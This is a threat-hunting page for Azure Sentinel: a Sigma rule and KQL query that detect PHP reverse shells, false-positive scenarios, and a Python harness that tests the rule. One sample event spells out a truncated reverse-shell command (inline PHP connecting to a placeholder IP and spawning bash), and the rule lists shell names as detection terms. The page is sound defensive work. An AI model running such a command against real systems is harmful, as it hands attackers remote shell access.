The hypothesis is that the detected PHP CLI usage may indicate an adversary establishing a reverse shell to exfiltrate data or execute commands remotely. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential command and control channels and mitigate advanced persistent threats.
Detection Rule
title: Potential PHP Reverse Shell
id: c6714a24-d7d5-4283-a36b-3ffd091d5f7e
status: test
description: |
    Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets.
    Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
references:
    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    - https://www.revshells.com/
author: '@d4ns4n_'
date: 2023-04-07
tags:
    - attack.execution
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|contains: '/php'
        CommandLine|contains|all:
            - ' -r '
            - 'fsockopen'
        CommandLine|contains:
            - 'ash'
            - 'bash'
            - 'bsh'
            - 'csh'
            - 'ksh'
            - 'pdksh'
            - 'sh'
            - 'tcsh'
            - 'zsh'
    condition: selection
falsepositives:
    - Unknown
level: high
imProcessCreate
| where TargetProcessName contains "/php"
    and (TargetProcessCommandLine contains " -r " and TargetProcessCommandLine contains "fsockopen")
    and (TargetProcessCommandLine contains "ash"
        or TargetProcessCommandLine contains "bash"
        or TargetProcessCommandLine contains "bsh"
        or TargetProcessCommandLine contains "csh"
        or TargetProcessCommandLine contains "ksh"
        or TargetProcessCommandLine contains "pdksh"
        or TargetProcessCommandLine contains "sh"
        or TargetProcessCommandLine contains "tcsh"
        or TargetProcessCommandLine contains "zsh")
Scenario: Scheduled PHP Cron Job
Description: A legitimate cron job runs a PHP script to perform routine maintenance or data processing.
Filter/Exclusion: Check for php -q in the command line and ensure the script path is in a known safe directory (e.g., /var/www/cron_jobs/).
Example: process_data.php in /var/www/cron_jobs/, run as php -q /var/www/cron_jobs/process_data.php

Scenario: PHP CLI Used for Code Execution in DevOps Pipeline
Description: A CI/CD pipeline uses the PHP CLI to run scripts for testing or deployment.
Filter/Exclusion: Filter commands that include known CI/CD tool names like git, npm, or docker, and check for execution in a pipeline directory (e.g., /opt/ci_pipeline/).
Example: php /opt/ci_pipeline/build_script.php triggered by a Jenkins or GitLab CI job

Scenario: Admin Task Using PHP CLI for System Monitoring
Description: An admin uses a PHP script to monitor system resources or logs.
Filter/Exclusion: Filter for known admin tools or scripts (e.g., monitor_system.php) and check for execution in a system admin directory (e.g., /opt/admin_tools/).
Example: php /opt/admin_tools/monitor_system.php run manually by an admin

Scenario: PHP CLI Used for Generating Reports
Description: A report generation script is run via the PHP CLI to produce daily or weekly reports.
Filter/Exclusion: Filter for known report generation tools (e.g., generate_report.php) and check for execution in a reporting directory (e.g., /var/reports/).
Example: php /var/reports/generate_report.php
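As an added example (not part of the original rule, the KQL translation, or the rule author's code), the following Python re-implements the Sigma selection block above and applies the safe-directory exclusions from the scenario list to a handful of constructed process-creation events. The event field names, sample command lines, the 198.51.100.7 address and the list of safe directories are assumptions; the shell substrings are copied from the rule as written. It also reports which shell terms actually fired and which terms in the list are redundant under substring matching.

```python
import shlex

# Constructed process_creation events, not real telemetry. Field names follow the
# Sigma logsource (Image, CommandLine); the KQL on the page maps them to
# TargetProcessName / TargetProcessCommandLine.
SAMPLE_EVENTS = [
    # inline PHP opening a socket and handing it to a shell (payload body truncated with "...")
    {"Image": "/usr/bin/php",
     "CommandLine": "php -r '$s=fsockopen(\"198.51.100.7\",4444);exec(\"/bin/bash ...\");'"},
    # scheduled cron job from the scenario list
    {"Image": "/usr/bin/php", "CommandLine": "php -q /var/www/cron_jobs/process_data.php"},
    # benign inline probe: no shell named, but the word "fresh" contains the substring "sh"
    {"Image": "/usr/bin/php8.2",
     "CommandLine": "php -r 'fsockopen(\"localhost\",80); echo \"fresh\";'"},
    # different interpreter carrying the same tokens: the Image filter must reject it
    {"Image": "/usr/bin/python3", "CommandLine": "python3 -r fsockopen bash"},
    # CI/CD pipeline script from the scenario list
    {"Image": "/usr/bin/php", "CommandLine": "php /opt/ci_pipeline/build_script.php"},
]

# Shell names exactly as listed in the rule's CommandLine|contains block.
SHELL_TERMS = ["ash", "bash", "bsh", "csh", "ksh", "pdksh", "sh", "tcsh", "zsh"]

# Assumed "known safe" directories, taken from the scenario list on the page.
SAFE_DIRS = ("/var/www/cron_jobs/", "/opt/ci_pipeline/", "/opt/admin_tools/", "/var/reports/")


def selection_matches(event: dict) -> bool:
    """Port of the Sigma 'selection' block: all three field conditions must hold."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    if "/php" not in image:                              # Image|contains: '/php'
        return False
    if " -r " not in cmd or "fsockopen" not in cmd:      # CommandLine|contains|all
        return False
    return any(term in cmd for term in SHELL_TERMS)      # CommandLine|contains (any)


def matched_shell_terms(cmd: str) -> list:
    """Which of the listed shell substrings fired; useful when triaging an alert."""
    return [term for term in SHELL_TERMS if term in cmd]


def subsumed_terms(terms=SHELL_TERMS) -> list:
    """Terms that can never add a match because a shorter term in the list is a substring of them."""
    return [t for t in terms if any(o != t and o in t for o in terms)]


def script_path(cmd: str):
    """First non-option argument (the script file), or None when code is passed inline with -r."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return None
    if "-r" in argv:
        return None
    for tok in argv[1:]:
        if not tok.startswith("-"):
            return tok
    return None


def is_excluded(event: dict) -> bool:
    """Scenario exclusion: a real script argument located under a known safe directory.

    Keyed on the parsed script path rather than a raw substring, so inline code (which
    has no script path) cannot satisfy the exclusion just by mentioning a safe directory.
    """
    path = script_path(event.get("CommandLine", ""))
    return path is not None and path.startswith(SAFE_DIRS)


def evaluate(events) -> list:
    """Return the command lines that match the selection and are not excluded."""
    return [ev["CommandLine"] for ev in events
            if selection_matches(ev) and not is_excluded(ev)]


if __name__ == "__main__":
    for cmd in evaluate(SAMPLE_EVENTS):
        print("ALERT:", cmd, "| shell terms:", matched_shell_terms(cmd))
    print("redundant shell terms:", subsumed_terms())
```

Two things the run makes visible. First, every entry in the shell list contains "sh", so under `contains` semantics the whole OR clause collapses to `CommandLine contains "sh"` and the third sample fires on the word "fresh"; anchoring the terms (for example on a path such as /bin/sh or on a word boundary) would tighten the rule without changing its intent. Second, the safe-directory exclusions from the scenarios should be tested against the parsed script argument, because the `-r` form the rule targets carries no script path at all and a bare substring check could be satisfied by any string inside the inline code.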